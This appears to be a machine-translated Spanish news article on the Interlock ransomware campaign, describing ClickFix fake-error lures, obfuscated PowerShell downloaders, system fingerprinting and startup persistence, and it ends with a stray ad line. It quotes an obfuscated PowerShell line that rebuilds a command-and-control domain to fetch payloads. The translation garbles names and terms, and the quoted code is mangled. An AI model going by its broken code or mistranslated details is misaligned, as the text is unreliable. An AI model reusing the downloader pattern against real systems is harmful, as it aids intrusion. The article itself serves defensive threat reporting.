El panorama de ciberseguridad continúa evolucionando a medida que los actores de amenaza desarrollan métodos cada vez más sofisticados para comprometer los sistemas de Windows.
Una nueva variante de ransomware conocida como Interlock ha surgido como una amenaza significativa, aprovechando la técnica engañosa de ingeniería social de ClickFix para ejecutar comandos maliciosos en máquinas de víctimas.
Este malware representa una evolución preocupante en las tácticas de implementación de ransomware, que combina enfoques de phishing tradicionales con mecanismos avanzados de entrega de carga útiles en varias etapas.
El ransomware entrelazado ha estado atacando activamente a las organizaciones en América del Norte y Europa desde septiembre de 2024, lo que demuestra una clara motivación financiera a través de su metodología de doble extorsión.
El grupo de amenazas detrás de este malware ha mostrado una notable persistencia y sofisticación técnica, empleando una cadena de ataque compleja que comienza con sitios web comprometidos y culminados en el compromiso completo del sistema.
Árbol de proceso de ataque por grupo Interlock (fuente – Esentire)
La capacidad del malware para hacer huellas digitales de los sistemas de víctimas y priorizar objetivos de alto valor indica una operación bien recurrente con objetivos estratégicos.
En julio de 2025, analistas de Esentire identificado Múltiples incidentes sofisticados atribuidos al grupo de enclavamiento, revelando las capacidades evolucionantes del ransomware y las metodologías de ataque.
Los investigadores de seguridad descubrieron que los actores de amenaza habían desarrollado un enfoque de múltiples capas que involucraba scripts de PowerShell, puertas traseras de PHP y herramientas de acceso remoto personalizado.
Este análisis exhaustivo ha proporcionado información crucial sobre las tácticas operativas, técnicas y procedimientos del malware, ofreciendo a la comunidad de seguridad cibernética inteligencia valiosa para medidas defensivas.
Descripción general del ataque (Fuente – Esentire)
El ataque comienza cuando las víctimas visitan, sin saberlo, los sitios web comprometidos, particularmente aquellos infectados a través de la cadena de compromiso de Kongtuke, que posteriormente redirige a los usuarios a las páginas maliciosas de ClickFix.
ClickFix representa una técnica de ingeniería social que engaña a las víctimas para ejecutar comandos dañinos mediante la presentación de mensajes de error falsos o notificaciones del sistema que parecen legítimas.
Tras la interacción con estos elementos engañosos, las víctimas pueden copiar y ejecutar comandos de PowerShell que parecen resolver problemas técnicos ficticios.
Mecanismo avanzado de infección en varias etapas
La sofisticación técnica del proceso de infección de Interlock demuestra la comprensión profunda de los actores de la amenaza de la arquitectura del sistema de Windows y los patrones de comportamiento del usuario.
La carga útil inicial de ClickFix emplea un comando de PowerShell ofondeado que establece la base para actividades maliciosas posteriores.
C Backdoor (Fuente – Esentire)
El comando Deobfuscated revela una cuna de descarga cuidadosamente diseñada diseñada para recuperar cargas útiles adicionales de la infraestructura de comando y control.
El comando PowerShell malicioso sigue este patrón: $ gt = “dng-m, i, crosoftds, com” .split (‘,’); $ yn = ‘htt’+’ps: //’+$ gt+$ gt (1)+$ gt+’.+$ Gt+’+’uva’+’+’+’bd’+’9′ ‘.
Esta técnica de ofuscación divide los componentes del dominio y los vuelve a montar dinámicamente, evadiendo efectivamente los mecanismos básicos de detección basados en cadenas mientras mantiene la funcionalidad.
Una vez ejecutado, el script PowerShell realiza el reconocimiento del sistema a través del comando SystemInfo, recopilando información integral de hardware y software que se transmite a los servidores de control y comando de los actores de amenaza.
Este proceso de huellas dactilares permite al malware determinar si el sistema objetivo representa una víctima valiosa o el honeypot de un investigador de seguridad.
Según este análisis, el malware procede con la cadena de infección o termina para evitar la detección.
El malware establece la persistencia a través de un mecanismo sofisticado que involucra atajos de Windows colocados en la carpeta de inicio de la víctima.
El componente simple del lanzador de procesos, identificado como C2.exe, utiliza la función API de Windows CreateProcessw para generar procesos adicionales de PowerShell mientras se muestra mensajes de error falsos para mantener la ilusión de los problemas del sistema.
Este enfoque engañoso, combinado con el uso de binarios legítimos de Windows como RunDLL32.exe, demuestra el compromiso de los actores de amenaza de combinar actividades maliciosas con operaciones normales del sistema.
Integre cualquiera. Pruebe 50 búsquedas de prueba gratuitas
